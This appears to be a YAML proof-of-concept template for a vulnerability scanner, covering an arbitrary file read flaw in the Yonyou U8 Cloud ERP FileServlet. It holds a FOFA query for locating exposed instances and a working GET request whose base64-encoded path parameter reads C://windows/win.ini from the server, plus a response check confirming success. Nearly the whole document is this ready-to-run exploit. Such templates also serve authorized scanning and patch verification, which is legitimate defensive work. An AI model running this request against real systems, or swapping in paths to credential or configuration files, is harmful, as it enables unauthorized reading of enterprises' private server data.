product: 用友U8-Cloud
vName: 用友U8 Cloud FileServlet 任意文件读取2
type: 文件读取
vID: []
level: 3
vDesc: U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统存在任何文件读取漏洞。
version: ''
note: ''
search:
  FOFA: app="用友-U8-Cloud"
protocol: http
link: https://mp.weixin.qq.com/s?__biz=MzIxMjEzMDkyMA==&mid=2247485971&idx=1&sn=1ff418faefa7d29d963287d2dcc9484f&chksm=974b8714a03c0e022db2152ca5aede423908c66bdc70e58877c80847c0d8455ad20f29c6fe25&scene=178&cur_album_id=2873032428486115330#rd
fix: []
model: ''
logic: and
exploit:
- exp:
    method: get
    follow: false
    path: /service/~hrpub/nc.bs.hr.tools.trans.FileServlet?path=QzovL3dpbmRvd3Mvd2luLmluaQ==
  verify:
    path: ''
    logic: and
    check:
    - status: 200
      body:
        value:
        - for 16-bit app support
        logic: and

